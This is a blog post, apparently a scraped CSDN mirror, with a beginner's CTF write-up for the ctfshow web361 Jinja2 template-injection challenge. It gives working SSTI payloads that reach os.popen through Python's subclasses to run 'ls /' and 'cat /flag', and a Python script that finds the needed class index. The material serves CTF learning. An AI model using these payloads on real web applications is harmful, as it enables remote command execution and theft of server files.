当前位置:网站首页>ctfshow-web361(SSTI)
ctfshow-web361(SSTI)
2022-04-23 18:29:00 【m0_62094846】
看到Hello,猜测输入的参数是name
?name={
{[].__class__.__base__.__subclasses__()}}
然后应该是要写脚本跑程序找需要的函数(用的别人的,现在还不会写python脚本)
这里利用os._wrap_close类
import requests
from tqdm import tqdm
for i in tqdm(range(233)):
url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={
{%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
r = requests.get(url=url).text
if('os._wrap_close' in r):
print(i)
输出132
然后开始运用
用__init__.__globals__查找popen(能查到就行,不需要位置)
__globals__:
该属性是函数特有的属性,记录当前文件全局变量的值,如果某个文件调用了os、sys等库,但我们只能访问该文件某个函数或者某个对象,那么我们就可以利用__globals__属性访问全局的变量
所以 __init__.__globals__应该就是要调用全局变量
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}
这里应该就是调用全局变量中的popen
os.popen() 方法用于从一个命令打开一个管道。(具体的不是很理解,大概应该就是可以使用命令的意思)
popen方法通过p.read()获取终端输出
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}
对于借助 open() 函数,并以可读模式(包括 r、r+、rb、rb+)打开的文件,可以调用 read() 函数逐个字节(或者逐个字符)读取文件中的内容。 (可能popen借助了open()函数,不是很清楚)
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
大概能看懂,知道为什么,但是不会用
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124347670
边栏推荐
- Queue solving Joseph problem
- JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
- Daily CISSP certification common mistakes (April 14, 2022)
- 玻璃体中的硫酸软骨素
- PowerDesigner various font settings; Preview font setting; SQL font settings
- C language simulates entering and leaving the stack, first in first out, first in first out, shared memory
- Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
- Log4j2 cross thread print traceid
- Rust: how to match a string?
- MySQL auto start settings start with systemctl start mysqld
猜你喜欢
MySQL auto start settings start with systemctl start mysqld
Resolves the interface method that allows annotation requests to be written in postman
Robocode tutorial 7 - Radar locking
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
SSD硬盘SATA接口和M.2接口区别(详细)总结
From introduction to mastery of MATLAB (2)
Docker installation MySQL
Cygwin64 right click to add menu, and open cygwin64 here
Qt读写XML文件(含源码+注释)
随机推荐
CISSP certified daily knowledge points (April 11, 2022)
Installation du docker redis
Resolves the interface method that allows annotation requests to be written in postman
Permission management with binary
Correct opening method of option
Mysqldump backup database
Domestic GD chip can filter
Analysez l'objet promise avec le noyau dur (Connaissez - vous les sept API communes obligatoires et les sept questions clés?)
STM32学习记录0008——GPIO那些事1
Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
Using transmittablethreadlocal to realize parameter cross thread transmission
Halo 开源项目学习(七):缓存机制
QT tablewidget insert qcombobox drop-down box
登录和发布文章功能测试
CISSP certified daily knowledge points (April 18, 2022)
Introduction to QT programming
A few lines of code teach you to crawl lol skin pictures
Rust: the output information of println is displayed during the unit test
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
Queue solving Joseph problem